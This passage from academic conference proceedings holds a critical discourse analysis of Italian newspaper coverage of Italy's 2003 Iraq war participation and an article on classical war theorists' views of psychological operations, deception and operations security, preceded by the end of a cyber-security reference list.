Krebs, B. (2009). PCs used in Korean DDoS attacks may self destruct. Available from: http://voices.washingtonpost.com/securityfix/2009/07/pcs_used_in_korean_ddos_attack.html (Accessed 4 September 2009).
Kulesza, J. (2010). State responsibility for acts of cyber-terrorism. Paper presented at the 5th GigaNet Symposium. Available from: http://api.ning.com/files/6Uhv8JceS2kZGH4RRbdEOAwdiHrryXnRiwQOv1MGYU6hEcBG9M4F5irLoK8B56a8hO*0kQ*CbTExGBpq8wjcPQZzChrSUrXV/KULESKA.pdf (Accessed 17 November 2010).
Phahlamohlaka, J. (2008). Globalisation and national security issues for the state: Implications for national ICT policies. Social Dimensions of Information and Communication Technology Policy, Vol. 282/2008, Springer, Boston, pp. 95-107.
Stiennon, R. (2009). SA could face cyber war. Available from: http://ww2.itweb.co.za/sections/internet/2009/0905291159.asp?A=COV&S=Cover&T=Section&O=C (Accessed 29 May 2009).
Vhembe District Municipality. (2007). Quality in Service. Available from: http://www.vhembe.gov.za/docs/Approved%20IDP%20final%20version%201%202007-8%20-2011-12.pdf (Accessed 2 February 2011).
Wikipedia. (2010). Vhembe District Municipality. Available from: http://en.wikipedia.org/wiki/Vhembe_District_Municipality (Accessed 2 February 2011).
Missionaries of Peace – The Creation of the Italian Identity in the Representation of the Political Discussion in Favour of Italy’s Participation in the Iraq War in Il Corriere della Sera
Marja Härmänmaa
University of Helsinki, Finland
marja.harmanmaa@helsinki.fi
Abstract: Linguistics is not a traditional method in security studies. However, today’s world and the information society are ever more based on texts and images, and both the sense of security and the sense of threat are produced with language in the first place. For this reason, the study of the discourse used in a conflict is of vital importance. The present paper deals with the political debate in favour of Italy’s participation in the Iraq war in the spring of 2003, as it is represented in one of Italy’s most important newspapers, Il Corriere della Sera. In using the term ‘representation’ I mean the interpretation of a given phenomenon with language. Following the method of critical linguistics elaborated by Roger Fowler, Robert Hodge and Gunther Kress, and based on the functional grammar of M.A.K. Halliday, I shall analyse the vocabulary and naming of different elements related to warfare, and transitivity; I shall examine the choice of agents and affected participants and the types of predicates to which they are related, as well as the argumentation strategies. In conclusion, I shall show how the representation of the Iraq war contributes to the creation of and/or emphasis on a specific national Italian identity.
Keywords: Italy’s national identity; Iraq war; discourse analysis; political discourse; media discourse; right-wing coalition
The war in Iraq officially began on March 19, 2003, when the United States started to bombard the country. The following day US troops crossed the southern border of Iraq from Kuwait and entered the country. Before the invasion, Washington had asked whether Italy was willing to offer first logistical and later direct military help if the war should start (Sarzanini, 10.4.2003). Public opinion and the left-wing opposition parties in Italy had been very much against any kind of Italian involvement, and demonstrations and strikes against the war started before the US invasion and continued after it. Although the right-wing government initially denied any possible Italian involvement in the warfare when it began, the leading politicians slowly started to change their opinions. At the end of March, Italy gave the US permission to send American paratroopers from Italy to Iraq. Around April 10 the Italian Prime Minister, Silvio Berlusconi, started to talk in public about the possibility of offering concrete military aid to the US (Di Caro, 11.4.2003). A few days later (April 15) first the Senate and then the Chamber of Deputies voted in favour of sending approximately 3000 Italian soldiers to Iraq in May: in the Chamber the decision was approved by 308 deputies, 31 voted against and 159 abstained; in the Senate it was approved with 153 votes, 26 against and 2 abstentions (Caprara, 16.4.2003). Soon after President Bush had proclaimed on May 1, 2003 that the war was over, Italian troops left for Iraq, where they stayed until December 2, 2006.
This paper focuses on the representation of the Iraq war by the Italian ruling politicians as they argued in favour of Italy’s participation, and as it was reported in an Italian newspaper. By representation I mean the interpretation given of a phenomenon with language. I am mainly using the method of critical linguistics as it was first developed by Roger Fowler, Robert Hodge and Gunther Kress. Based on the systemic-functional grammar of M.A.K. Halliday, critical linguistics is one method of critical discourse analysis. In this kind of representational analysis the especially crucial features are naming and transitivity (Fowler, Hodge, Kress and Trew 1979; Fairclough 1995; Hodge and Kress 1996; Lehtonen 2000, 44-48).
Representation is always created from a specific ideological point of view. According to critical linguistic theory, any aspect of linguistic structure, whether phonological, syntactic, lexical, semantic, pragmatic or textual, can carry ideological significance; in other words, ideology is expressed systematically through differences in forms of expression, in different choices of words and grammatical phrasing (Fowler 1991, 36, 66, 67). As sociologists nowadays agree, newspapers and the media, instead of reflecting reality, rather produce it from a certain ideological point of view. The news is one product among others. Its publication is the result of a complex selection that reflects the ideology of the newspaper and of the society to which it is addressed: these factors not only give relevance to a phenomenon reported as news, but also determine how it is reported (Fowler 1991; Fairclough 1995).
This research is based on articles published between March 19 and May 1, 2003 in the best-selling and most widely read Italian newspaper, Il Corriere della Sera. The paper was founded in Milan on March 5, 1876, and many prominent Italian intellectuals and writers have collaborated with it. Nowadays the newspaper belongs to RCS MediaGroup, the first Italian publisher to have developed a strong international presence in the daily newspaper sector; it also has interests in the Spanish market through the company Unedisa, which publishes the daily El Mundo. Over half of the shares of RCS MediaGroup are owned by large enterprises (FIAT holds about 10%) and banks: Mediobanca S.p.A., Italy’s leading banking group, is the main shareholder with over 13% of the shares. From a political point of view, Il Corriere della Sera is independent, but it is situated in the centre-right. It is distributed all over the world and has free Internet sites that are updated daily. [1]
For the present research, I have studied the articles in Il Corriere della Sera’s Internet archive, [2] which seems to hold all past issues from 1991 onward; only the photographic material is lacking. The articles conserved in the Internet archive are mainly news items, with fewer comments or editorials. The central feature of the news about the political decision-making is the abundance of direct quotations from politicians’ speeches or words, in most cases indicated by quotation marks. Quotations in the press have two basic functions: on the one hand, they are used to emphasise certain words or expressions, and on the other, to mark a citation. The purpose of a citation is to make the text more “objective”, to create the illusion that things speak for themselves (Tuomarla 2000: 163). For this reason the direct, explicit voice of the newspaper on some occasions seems to be lacking, and what I am in fact studying is the language that the politicians have used and that has subsequently been reported in the articles. Of course the “objectivity” is only an illusion, since the author subjectively chooses what to put in the text and which words or statements to report, even as direct quotations. Moreover, in many cases the language used by the politicians coincides with the language of the newspaper: the terms, expressions or statements that on some occasions are placed between quotation marks are on other occasions used directly by the journalist. However, with this tactical choice of using citations the author is able to avoid making statements of his/her own, and instead puts him-/herself in the background in the role of a merely objective observer.
The decisions about which matters the author considers to have “news value”, and thus reports as news, are also made subjectively. By archiving the articles about the political decision-making, Il Corriere della Sera first of all shows its normal interest in domestic politics, and secondly assumes the role of mediator: the paper informs the public about the point of view of the Italian politicians by reporting what they have said about the matter. The articles on the Internet could thus be considered a sort of archive of historical documents (instead of news articles only), with which one could reconstruct the chronology of the decision-making that led to Italy’s participation in the war.
The image of the war that emerges from these particular articles is extremely abstract and sterile. Whereas the main protagonists are the Italian politicians or Italy as a country, there are no real warriors. During the whole period, the aggressors in Iraq, George Bush or Saddam Hussein, the original reason for the war, and the Iraqi people are hardly mentioned at all. The tragic events that on the frontline led to the destruction of the Iraqi army, as well as the brutal attacks against civilians by the US forces, which together caused thousands of casualties within the first few weeks of the war, are mentioned very little, if at all. The war that is discussed by the politicians is truly a paper war without weapons, victims or reason: it is a war fought among the politicians about the meaning of terms, having as its final aim the shipment of Italian troops to Iraq with a valid justification.
One linguistic strategy that renders the representation of the war ever more abstract is the abundance of mental and verbal actions, whilst there are very few physical ones. As is normal in political language, here too people are “saying”, “considering” or “deciding”, instead of “attacking”, “shooting” or “bombarding”, which would be rather normal terms in an article about a war. The metaphorical representation of processes as entities, through the nominalisation of verbs, also contributes to the idea that it is more a question of an intangible dilemma than of a concrete course of action and a human catastrophe. For instance, when the newspaper writes about the “sending of the Italian troops on an operation of peacekeeping in Iraq” (Verderami, 15.4.2003), not only are the verb and the agent missing, but the true nature of the action also fades away in a vague noun: “the operation of peacekeeping”.
[1] See the information delivered by RCS MediaGroup on their Internet home page http://www.rcsmediagroup.it/wps/portal/mg/home/?language=it
[2] http://archiviostorico.corriere.it/
In most cases the event itself is explicitly called “war” (la guerra); however, usually there is no specification of where or against whom the war is conducted. In some cases it is mentioned that the war is in Iraq (la guerra in Iraq). Only in one case is it specified that the war is actually fought “against” Iraq (l’imminente guerra all’Iraq). There are also numerous synonyms and quasi-synonyms, as is usual when the topic is a particular preoccupation or problem (Fowler 1991, 85). On many occasions, to soften the significance of ‘war’, the journalists have used alternative words, such as ‘conflict’ (un conflitto), ‘military intervention’ (l’intervento militare), ‘direct intervention’ (l’intervento diretto) or ‘offensive actions’ (azioni offensive). Only in a few cases are those “really responsible” for these “actions” mentioned, and the operation is called ‘US intervention’ (l’intervento Usa) or ‘the Anglo-American attack’ (l’attacco angloamericano), even though here as well the process is nominalised and the agent disappears into the adjective.
Negotiating the political line of a country can be considered a negotiation of the country’s identity. By creating or emphasising a certain identity, politicians are able to justify a certain role in the field of international politics. [3] In this case the Italian government wanted at any price for the country to have an active role and participate in the war, regardless of the fact that public opinion was against it. To sustain their point of view, the politicians have to know which positions the public will accept, which positions must be defended, and how these positions should be defended. In other words, the politicians have to be aware of the Italians’ innate “identity”: what their interests, values and beliefs are (Lo Cascio 1991; Perelman 1996). This has an effect on the strategies of argumentation, the authorities appealed to, and the terminology. Vocabulary is of great interest, for it can be regarded as a representation of the world for a certain culture, or of the world as it is perceived according to the ideological needs of a culture (Fowler 1991, 82).
Before the parliament was to take the decision about Italy’s military participation in the war on April 15, the authorities to whom the newspaper appeals are the US and Great Britain: Prime Minister Berlusconi will send military troops to Iraq as the US and Great Britain have asked, and as the Italian Prime Minister Silvio Berlusconi had promised in a phone call to President Bush before the war started (Sarzanini, 10.4.2003; Di Caro, 11.4.2003; Verderami, 15.4.2003). With such an argumentation, the right-wing government not only openly showed its pro-American policy, but Italy is also represented as a reliable country that cannot, and will not, rescind a promise it has given – although it is questionable whether Prime Minister Berlusconi had the right to make such a promise on his own. In addition, Italy’s presence in Iraq among the first foreign countries becomes a sign of its political prestige on the international level. There is the urge to hasten, as Poland is already in Iraq, whilst Spain, Denmark, Holland and Portugal are about to go there too (Verderami, 15.4.2003). The craving to gain political importance through participation in the war is also evident in the titles of the articles, such as “The phase of emergency starts and our country will participate among the first ones” (Sarzanini, 10.4.2003), or “We and the USA will sow democracy” (Di Caro, 17.4.2003), which gives the idea of a close collaboration between the US and Italy in the administration of Iraq. In “Within six months a command to Italy” (Nese, 4.5.2003) the title is almost misleading, as the topic of the article concerns the quality and quantity of the troops that will be sent to Iraq, whilst a hypothesis about the organisation of the administration of the foreign soldiers is mentioned only briefly.
Nevertheless, Italy is not only a Catholic country among others; it is the very centre of Catholicism. The strong presence of the Catholic Church has an influence on social life and civilian values. Furthermore, Italy was one of the aggressors in the Second World War, the memory of which, and a sort of shame, still persist among the adult population of the country. Therefore, any argumentation on behalf of sending soldiers to an occupied country to help the aggressor, against international law and without the consent of the UN, based on any kind of utility, would simply be unacceptable to the great majority of the people. Instead, the main reasons why Italy should participate in the war are humanitarian.
Halliday has used the term ‘anti-language’ for the cases in which words change their meaning (Halliday 1976). In the discourse of the right-wing politicians, helping the invader to control a foreign country is transformed into ‘peace-keeping’. The activity of the Italians in Iraq will concern peace, which, on the other hand, shows the capacity of the politicians to foresee the future, since during the publication of these articles the war was still going on: the Italian “soldiers [go] to Iraq for peace”, there will be sent “an Italian body of peace” that is “ready to participate in peace-keeping”. The Italian one is “a mission that will guarantee peace in Iraq”. Alternatively, the reasons are related to charity. The Italians will “do this task to defend the population”. The approximately 3000 soldiers will be sent to Iraq for “humanitarian purpose”, to “guarantee the aid”, to “bring humanitarian help to tormented Iraq” (Fregonara, 14.4.2003) and “in order to alleviate the sufferings of the Iraqi people” (Franchi, 16.4.2003). The government has created a “humanitarian machine” (Sarzanini 10.4.2003) that will effectuate “a humanitarian intervention” (Verderami, 13.4.2003), and contribute to “the humanitarian stabilization in Iraq” (Fregonara, 14.4.2003).
³ Researchers from different disciplines have different definitions of terms like ’identity’, ’role’, ’self’, ’subject’, and so on. Here I agree with Ivanič, according to whom the term ‘role’ “refers to the public, institutionally defined aspect of identity”, whilst ‘identity’ is a more private aspect (Ivanič 1998, 10).
124
Marja Härmänmaa
In addition to the topics of medicine, sanitation, and reconstruction of the streets, bridges and buildings, a peculiar national characteristic of the Italian discourse about the war is the argumentation on behalf of the salvation of Iraqi cultural heritage. It is mentioned in different articles that the Italians will work to rescue the historical monuments and works of art (Nese, 18.4.2003; Caprara, 20.4.2003). Yet in one article it is presented as one of the main reasons to go to Iraq, as the title explicitly states: “On the front line for cultural heritage” (Conti, 4.5.2003).
In all these articles Iraq is represented, when it is represented, as a country that is in a state of extreme confusion, and therefore urgently needs the Italians to rescue it and to react “to the nightmare of emergency” created in Iraq (Breda, 15.4.2003). Since no reason is given for this confusion, the result is that the disorder was born out of nothing, like a natural catastrophe. Moreover, it seems to have nothing to do with the ongoing warfare, since the only concrete attributions about the nature of the disaster are related to criminality: it is “a country at the mercy of corruption, of speculation, of black market, of robbery and of spreading criminality”, a “disastrous country” (Nese, 5.5.2003), a country of “plundering and banditry” (Caprara, 20.4.2003). The Iraqi people are mentioned only once, as a passive group with neither a will of their own nor the capacity to react in any way to the “criminality” that somehow and suddenly “has spread” in their home country, and for this reason: “the Iraqi people cannot be left alone”, whereas from Italy’s part, “it would only be vile not to stop the agony of Iraq” (Verderami, 13.4.2003).
The most frequent term used to describe the nevertheless obscure activity of the Italians in Iraq, the true slogan of this cruel and disastrous adventure, is ‘mission’ (la missione). This term, in Italian, has many connotations and can be used in a military, political, civic or religious sense. In any case, it always contains the idea of devotion, moral obligation or duty towards the army, the State, the society or the Church that has given the commission (Lo Zingarelli 2003). It is repeatedly mentioned in the articles that the Italians have a mission in Iraq (Breda, 15.4.2003). It is: “a humanitarian mission of the Italian government”; a mission “that will guarantee peace”; a mission for the freedom of the country: “the mission Iraqi freedom” (Verderami, 15.4.2003).
Thus, in these articles, willingly or not, the Italians, like the Iraqi people, are also transformed into a group of unconscious people, unable to decide how to act and react in the face of war. Going to Iraq is represented as an obligation or a duty that they simply cannot decline -- even though it is not pointed out who creates this obligation, what kind of sacrifices fulfilling this duty will actually require, nor what the duty will actually entail. Nevertheless, “Italy, therefore, will do her duty” as the Italians “cannot and [they] must not stay unarmed in front of the situation of Iraq after the war”. And, since the Italians were “fully aware of [their] role” (Verderami, 13.4.2003), they went to Iraq, and stayed there for over two years.
Conclusion: “The humanitarian mission[s] of the Italian government[s]”
There is an Italian proverb according to which “Il lupo cambia il pelo ma non il vizio”, which literally translated into English would be: “The wolf changes the hair but not the vice.” The notion of “the Italians’ mission in the world” was already peculiar to Giuseppe Mazzini (1805-1872), a great 19th-century politician, a leading figure of liberal nationalism, as well as of Il Risorgimento, the unification of Italy. Mazzini’s political rhetoric is full of religious terms that reflect his religious concept of Nation, Fatherland and politics in general. According to Mazzini, the Italians had a special “mission that [no more no less] God had given”, a “duty towards humanity”, “to fight wherever for the liberty of the people”. Mazzini justified his ideas with the concept of the Italians as heirs of all the values Rome represented and with the significance of the city of Rome in Western history. According to him, Rome had twice been “metropolis”, “the Temple” of Europe, as it had worked for the unification of the continent, first during the Roman Empire and later when it became the centre of Christianity (Mazzini 1860).
The glorification of Roman history, placing the eternal city as a model for the arts and for social life, and the idea of the Italians as its successors is a constant feature in the history of Italy. It manifested itself particularly in the Renaissance, and in the twentieth century, when Fascism adopted the cult of Rome, romanità, to serve its ever more aggressive political goals (Visser 1992). Though the tradition of classical culture persists even today in Italy as elsewhere in the Western world, according to the Italian historian Antonio La Penna the disastrous Second World War and the end of Fascism nevertheless made the Italians renounce the idea of being the privileged heirs of ancient Rome (La Penna 1973, 1326).
The Italian government that took the decision to send troops to Iraq was composed of a coalition of right-wing parties, among which the most important are Forza Italia, the populist neo-liberalist party of the Prime Minister, Silvio Berlusconi, and Alleanza Nazionale, classified by political scientists as a post-Fascist party, whose secretary, Gianfranco Fini, was the Vice Prime Minister in spring 2003 (Ignazi 1994; Tarchi 1995).
To gain an important role in international politics has been the goal of Italian politicians since the unification of the country, from the second half of the nineteenth century until now. Italy could justify its claims on economic grounds (the country was a member of the former G7) or on demography (with a population of more than 60 million inhabitants, it was the fourth largest country in the EU at that time). However, this is not the case. Just as in Mazzini’s rhetoric the justification is found in the intrinsic Italian spirit and in history, so the Berlusconi government’s argumentation appealed to the Italian role in the world as missionaries of goodwill. There are clear affinities between the rhetoric of Mazzini and that of the government in the spring of 2003; yet the latter, instead of Roman legionaries, sent to “Mesopotamia” a group of “Catholic Saints”. Whether in practice there is any difference between these two is another question.
References
Breda, M. (15.4.2003) “Emergenza umanitaria, l’apertura del Quirinale”, Il Corriere della Sera.
Caprara, M. (16.4.2003) “Il parlamento vara la missione a Bagdad”, Il Corriere della Sera.
Caprara, M. (20.4.2003) “Soldati al Sud, aiuti al Nord. Doppio problema per l’Italia”, Il Corriere della Sera.
Di Caro, P. (11.4.2003) “’Non conto sulla sinistra per l’Iraq’”, Il Corriere della Sera.
Di Caro, P. (17.4.2003) “Noi e gli Usa semineremo democrazia”, Il Corriere della Sera.
Fairclough, N. (1995) Media Discourse, Arnold, London.
Fowler, R. (1991) Language in the News. Discourse and Ideology in the Press, Routledge, London and New York.
Fowler, R., Hodge, B., Kress, G. and Trew, T. (1979) Language and Control, Routledge, London.
Franchi, P. (16.4.2003) “Ritorno alla ragione”, Il Corriere della Sera.
Fregonara, G. (14.4.2003) “Aiuti e truppe, domani il voto”, Il Corriere della Sera.
Halliday, M.A.K. (1976) Language as Social Semiotic. The Social Interpretation of Language and Meaning, Edward Arnold, London.
Hodge, B. and Kress, G. (1996) Language as Ideology, Routledge, London.
http://archiviostorico.corriere.it/
http://www.rcsmediagroup.it/wps/portal/mg/home/?language=it
Ignazi, P. (1994) Postfascisti? Dal Movimento sociale italiano ad Alleanza nazionale, Il Mulino, Bologna.
Ivanič, R. (1998) Writing and Identity: The discoursal construction of identity in academic writing, John Benjamins, Amsterdam.
La Penna, A. (1973) “La tradizione classica nella cultura italiana”, Storia d’Italia, vol. II, Einaudi, Torino.
Lehtonen, M. (2000) Merkitysten maailma. Kulttuurisen tekstintutkimuksen lähtökohtia, Vastapaino, Tampere.
Lo Cascio, V. (1991) Grammatica dell’argomentare. Strategie e strutture, La Nuova Italia, Scandicci.
Lo Zingarelli (2003) Vocabolario della lingua italiana di Nicola Zingarelli, Zanichelli, Bologna.
Mazzini, G. (1860) Doveri dell’uomo, http://www.liberliber.it/biblioteca/m/mazzini/index.htm
Nese, M. (18.4.2003) “Soldati e mezzi a Bagdad non prima di due mesi e sotto comando inglese”, Il Corriere della Sera.
Nese, M. (4.5.2003) “Agli italiani il controllo dei villaggi”, Il Corriere della Sera.
Perelman, C. (1996) Retoriikan valtakunta [L’empire rhétorique], Vastapaino, Tampere.
Sarzanini, F. (10.4.2003) “La squadra: carabinieri, sminatori ed esperti di armi chimiche”, Il Corriere della Sera.
Tarchi, M. (1995) Cinquant’anni di nostalgia. La destra italiana dopo il fascismo, Rizzoli, Milano.
Tuomarla, U. (2000) La citation mode d'emploi sur le fonctionnement discursif du discours rapporte direct, Suomalainen Tiedeakatemia, Helsinki.
Verderami, F. (13.4.2003) “I Paesi amici dei terroristi ora lo sanno. Possibile colpire chi minaccia la pace”, Il Corriere della Sera.
Verderami, F. (15.4.2003) “Un patto con Bush prima della Guerra: subito forze italiane”, Il Corriere della Sera.
Visser, R. (1992) “Fascist Doctrine and the Cult of the Romanità”, Journal of Contemporary History, Vol. 27, No. 1, pp. 5-22.
Thoughts of War Theorists on Information Operations
Arto Hirvelä
National Defence University, Helsinki, Finland
arto.hirvela@mil.fi
Abstract: Information operations (INFO OPS) increase in value as a means to reach ends in wars and lesser crises. Nowadays, the effectiveness of information operations depends on knowledge and control of all of its different aspects as well as on the ability to utilize superior technology. Not all methods of INFO OPS require a significant technological advantage, nor are they generated by it, even though a great many of the vulnerabilities are based on technology. Even some ancient war theorists have written about the value of some INFO OPS methods, e.g., psychological operations and military deception. Even though psychological operations as such were not included in war plans in the age of the war theorists covered in this article, due to a lack of media, proper means and the slowness of communication, every theorist acknowledged the value of psychological operations. The revolution in military affairs (RMA) has been discussed at length by military researchers. INFO OPS is one of the concepts being used to rationalize RMA. Consequently, the development of INFO OPS must be scrutinised. In this article the thoughts of the war theorists Sun Tzu, Flavius Vegetius Renatus, Maurice de Saxe, Napoleon Bonaparte, Carl von Clausewitz and Sir Basil Liddell Hart are analyzed from the viewpoint of various aspects of INFO OPS. The analysis concentrates on psychological operations, on military deception and on operations security. The analysis is based on a loose framework of content analysis.
Keywords: information operations, psychological operations, military deception, operations security, war theorist
1. Introduction
Even without having modern information technology to reach the masses, war theorists perceived the value of the methods that we now call information warfare or information operations. The tools of psychological operations and military deception were obviously different then, but the advantages of these methods and of operations security have existed since the concept of war was invented. This is clearly present even in the writings of the ancient war theorists.
Affecting the opponent’s morale, as it was understood in earlier times, is what we now call Psychological Operations. Psychological Operations (PSYOPS) are described as planned psychological activities using methods of communication. This includes the use of media products, face-to-face communication and other means directed at target audiences in order to influence perceptions, attitudes and behaviour so as to reach political and military objectives. Present-day PSYOPS are conducted to convey selected information and indicators to governments, organisations, populations, groups and individuals, with the aim of ultimately changing their behaviour and decisions. These aims do not differ from the aims that the aforementioned theorists describe. Successful PSYOPS weaken the will of an adversary, reinforce the feelings, stimulate the co-operation of the loyal and sympathetic, and gain the support of the uncommitted (MNIOE 2009).
Deception has been a decisive part of many successful offensives. Deception is complex and demands considerable effort and understanding of an adversary's way of thinking. Deception operations require a way to hide or cover real action and to deny critical information about both real and deceptive activities. Knowledge of deception plans must be carefully protected and distributed only to those crucial to the deception operation. Deception during operations can directly contribute to the achievement of surprise and indirectly to security and economy of effort. Deception operations must not affect the credibility of the forces or higher authorities (MNIOE 2009).
Counter Intelligence and Operations Security have been and are being used to protect critical information from falling into enemy hands. Operations Security (OPSEC) is an analytical process intended to reduce the risk to a military operation from adversary intelligence exploitation, and to maintain freedom of action by preventing an adversary’s foreknowledge of friendly dispositions, capabilities and intentions.
OPSEC as a process identifies critical information and determines what indicators hostile intelligence systems may obtain that could be used to derive critical information in time to be useful to adversaries. OPSEC then analyses the susceptibility of information to exploitation by an adversary’s intelligence (vulnerabilities) and the operational capabilities, motivation and intentions designed to detect and exploit those vulnerabilities (threat analysis). OPSEC also assesses the potential degree to which critical information is subject to loss through exploitation by an adversary (risk analysis) and then selects and executes counter-measures that eliminate or reduce the vulnerabilities to an acceptable level.
OPSEC is concerned with the achievement of secrecy and surprise in military operations and activities by protecting capabilities and intentions from hostile intelligence exploitation. The ultimate objective is to prevent an adversary from obtaining sufficient information in a timely manner to predict and degrade one’s operations or capabilities. Effective OPSEC contributes to Information Superiority.
OPSEC concentrates on those activities that could indicate the existence of an organisation, an impending operation or its details, or that could reveal intentions, dispositions, capabilities and potential vulnerabilities. These activities are then protected using a range of counter-measures (MNIOE 2009).
2. War theorists’ views
2.1 Sun Tzu
Sun Tzu described the tenets of warfare over two thousand years ago. In his maxims he takes into consideration many aspects that we now include in information operations. Subsequent theorists more or less follow his ideas.
Sun Tzu sees INFO OPS as a means to achieve supreme excellence in warfare. His often quoted statement “to fight and conquer in all your battles is not supreme excellence; supreme excellence consists in breaking the enemy's resistance without fighting” is a basic concept in INFO OPS. Sun Tzu’s advice is to defeat the enemy’s plans and not to attack the enemy's army on the field, where possible (Sun Tzu 1998).
Sun Tzu discusses psychological operations across several chapters. He concludes that a whole army may be robbed of its spirit, and a commander-in-chief may be robbed of his presence of mind (Sun Tzu 1998). Sun Tzu’s advice that when you surround an army you should leave an outlet free and not press a desperate foe too hard is echoed in the writings of Vegetius.
Sun Tzu gives military deception a lot of credit by stating that all warfare is based on deception (Sun Tzu 1998). He bases the use of military force on always appearing to be what you are not and to be where you are not supposed to be.
Sun Tzu gives several examples of OPSEC for the purposes of military deception. He states that by discovering the enemy's dispositions and remaining invisible ourselves we can keep our forces concentrated, while the enemy's must be divided. He also continues that the place where we intend to fight must not be made known, for then the enemy will have to prepare against a possible attack at several different points, which makes him weaker. Sun Tzu concludes that in making tactical dispositions, the highest thing you can attain is to conceal them, because then you will be safe from the prying of the subtlest spies and from the machinations of the wisest brains (Sun Tzu 1998).
2.2 Flavius Vegetius Renatus
Flavius Vegetius Renatus acknowledged the essence of operations security, military deception and psychological operations, and thus all the aspects of INFO OPS of his time. About deception he concluded that the Romans were always unequal to the Africans in deception and stratagem (Vegetius 2004). However, he stated that an able general never loses a favourable opportunity to surprise the enemy. The complexity of deception or the rigid organization of the Romans did not prevent them from seeking the advantage of surprise.
Vegetius emphasized military training and hardening soldiers. He stated that few men are born brave; many become so through training and force of discipline. The courage of the soldier is heightened by the knowledge of his profession (Vegetius 2004). A courageous soldier is less susceptible to intimidation by the enemy. Vegetius also acknowledged the value of psychological operations by stating that to seduce the enemy’s soldiers from their allegiance and encourage them to surrender is of special service, for an adversary is more hurt by desertion than by slaughter (Vegetius 2004). The desertion of one man could also lead to the desertion of many more and therefore also diminish the opponent’s view of his own leadership. Vegetius understood that giving the enemy the chance to leave combat would tempt him to desert or retreat. That is why he stated that generals unskilled in war think a victory incomplete unless the enemy are so straitened in their ground or so entirely surrounded by numbers as to have no possibility of escape. Vegetius clarified that when the enemy has free room to escape he thinks of nothing but how to save himself by flight, and as the confusion spreads, great numbers are cut to pieces.
On the other hand, an army weak and few in number becomes a match for the enemy from this very reflection, that it has no resource but to fight in despair (Vegetius 2004). By giving an enemy a way to surrender, a skilled commander tempts them to do so.
Vegetius understood the meaning of operations security. His advice is that leaders should consult with many people on the proper measures to be taken, but communicate the plans they intend to put into execution to a select few of the most assured fidelity: or rather, trust no one but themselves. He also understood what it means for one’s operations security to fail, and recommends that when you find out the enemy has knowledge of your designs you must immediately alter your plan of operations (Vegetius 2004). Vegetius was — as in OPSEC now — concerned with the achievement of secrecy and surprise through protecting capabilities and intentions from hostile intelligence exploitation. The objective was then, as it is now, to prevent an adversary from obtaining sufficient information in a timely manner to predict and degrade our operations or capabilities.
Although Vegetius did not use the modern terms of INFO OPS, he used many of the means of modern INFO OPS.
2.3 Maurice de Saxe
Marshal Maurice de Saxe stated that it is not the big armies that win battles, it is the good ones. He also acknowledged the value of psychological effects by stating that hope encourages men to endure and attempt everything; in depriving them of it, or in making it too distant, you deprive them of their very soul. (de Saxe 1944) Even though de Saxe focused on economical inspiration, he repeated Vegetius' advice about maintaining good discipline.
2.4 Napoleon Bonaparte
Napoleon stated that in war you should never do what the enemy wishes you to do, for the reason that he desires it. (Chandler 2002) The tools for keeping the opponent unaware of your true intentions are OPSEC and military deception. Napoleon's means of OPSEC and protection of plans were based mostly on centralized command, which he emphasized frequently. (Chandler 2002) Napoleon organized his command so that he was able to control subordinates himself or through aides who had the authority to make changes to orders. This sped up the decision cycle and enhanced operations security, giving Napoleon an advantage against his opponents. (Britt & Griess 2003) He also used deception to lure opponents into a trap, thus causing more casualties with fewer troops. (Barnet 1978)
Napoleon Bonaparte stated that the moral is to the physical as three to one, acknowledging the value of psychological operations. (Liddell Hart 1991) About courage, Napoleon stated that it is the second quality required of soldiers (Chandler 2002).
He also stated that the secret of war lies in the communications and brought up its significance many times. (Chandler 2002) Lines of communication need to be protected and enemy lines threatened. Lines of communication may also be used to deceive by luring the enemy to target false lines.
2.5 Carl von Clausewitz
Carl von Clausewitz acknowledged the physical and psychological aspects of war. He repeatedly used concepts like physical and moral power, force and superiority. (Clausewitz 2008) According to him, physical power alone is not enough, since moral power is also essential to victory in war. Battles may be won without fighting if the opponent perceives the other side to be much stronger and yields as a result. (Clausewitz 2008) The opponent's understanding of the situation may be manipulated with deception and psychological operations. Clausewitz emphasized that when destroying enemy forces, nothing obligates us to limit this idea to physical forces; the moral element must also be taken into account. He understood and described, in the same way that Vegetius did, that a great destructive act – a major victory – may be achieved through psychological effects, as the moral factor is the most fluid element of all, and therefore spreads most easily to affect everything else. (Clausewitz 2008)
Clausewitz writes about the destruction of military power, that is, it must be reduced to such a state as not to be able to prosecute war. (Clausewitz 2008) That might also mean that the enemy's will to oppose is taken away, which may be done with psychological operations. Clausewitz also states that "even when the enemy is no longer able to prosecute the war and his land is conquered, still the war, that is, the hostile feeling and action of hostile agencies, cannot be considered as at an end as long as the will of the enemy is not subdued also". (Clausewitz 2008) Therefore, according to Clausewitz, it may be concluded that reducing the enemy's military power to such a state that it is no longer able to prosecute war is not enough; the will of the opposing agencies must also be subdued.
On the other hand, Clausewitz recognized that there are many ways to reach the aims of war, and that the complete subjugation or outright defeat of the opponent is not essential in every case. (Clausewitz 1989) The opponent may be persuaded or compelled by means of psychological operations to lose his will or moral force, as Clausewitz described. Moral elements are, according to Clausewitz, among the most important in war. (Clausewitz 1989)
For Clausewitz, surprise is an independent element that has the psychological effect of gaining superiority. Surprise is produced by speed and secrecy. (Clausewitz 1989) Clausewitz did not consider military deception to be a very effective tool. He considered deception to have so little strategic value that it should be used only if a ready-made opportunity presents itself. (Clausewitz 1989)
2.6 Sir Basil Henry Liddell Hart
All in all, Liddell Hart understood the overall importance of non-lethal methods like INFO OPS and stated that it is more potent, as well as more economical, to disarm the enemy than to attempt to destroy him by hard fighting. He continued that a strategist should think in terms of paralyzing, not of killing.
He recognized the value of military deception in stating that the most effective indirect approach is one that lures or startles the opponent into a false move. Deception can then directly contribute to the achievement of surprise and indirectly to security and economy of effort, as stated in the present description of the term (MNIOE 2009).
Liddell Hart took the idea of psychological operations further with the advice that "even on the lower plane of warfare, a man killed is merely one man less, whereas a man unnerved is a highly infectious carrier of fear, capable of spreading an epidemic of panic. On a higher plane of warfare, the impression made on the mind of the opposing commander can nullify the whole fighting power that his troops possess. And on a still higher plane, psychological pressure on the government of a country may suffice to cancel all resources at its command – so that the sword drops from a paralyzed hand" (Liddell Hart 1991). Liddell Hart thus reiterated what Vegetius had stated before, that it is better to affect the mind than the body because psychological effects cause more damage to the opponent. With psychological effects the battle can be won, as Sun Tzu stated, without fighting.
